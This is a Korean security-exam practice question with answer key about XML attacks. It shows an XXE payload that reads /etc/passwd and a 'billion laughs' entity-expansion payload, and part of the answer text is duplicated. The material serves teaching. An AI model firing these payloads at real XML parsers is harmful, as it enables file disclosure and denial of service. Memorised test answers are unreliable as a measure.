14. 아래에서 설명하는 보안 취약점에 대해서 질문에 답하시오.
[코드 1]<?xml version="1.0"?> <!DOCTYPE foo <!ELEMENT foo ANY <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo> &xxe ;</foo>[코드 2]<?xml version="1.0"?> <!DOCTYPE lols <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> ..... <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lols>&lol9;</lols>(1) [코드 1]에 제시된 공격기법의 이름을 쓰시오. (2) [코드 1]의 공격기법의 원리와 취약점을 서술하시오. (3) [코드 2] 코드를 실행했을 때 그 결과에 대해서 설명하시오.
클릭하면 정답이 보입니다.
| 정답 확인 | 맞췄어요 O | 틀렸어요 X |
(1) XXE(XML eXternal Entity) 인젝션
(2) XML 문서 안에서 외부의 개체를 참조하게 되는데 이때 외부 개체에 삽입된 악의적인 코드가 실행되어 데이터 유출, 서비스 거부 공격 등을 수행할 수 있음
(3) 엔티티 참조를 반복하면서 메모리 고갈, 이로 인한 서비스 불가
(2) XML 문서 안에서 외부의 개체를 참조하게 되는데 이때 외부 개체에 삽입된 악의적인 코드가 실행되어 데이터 유출, 서비스 거부 공격 등을 수행할 수 있음
(3) 엔티티 참조를 반복하면서 메모리 고갈, 이로 인한 서비스 불가
문제 풀이
클릭하면 보입니다.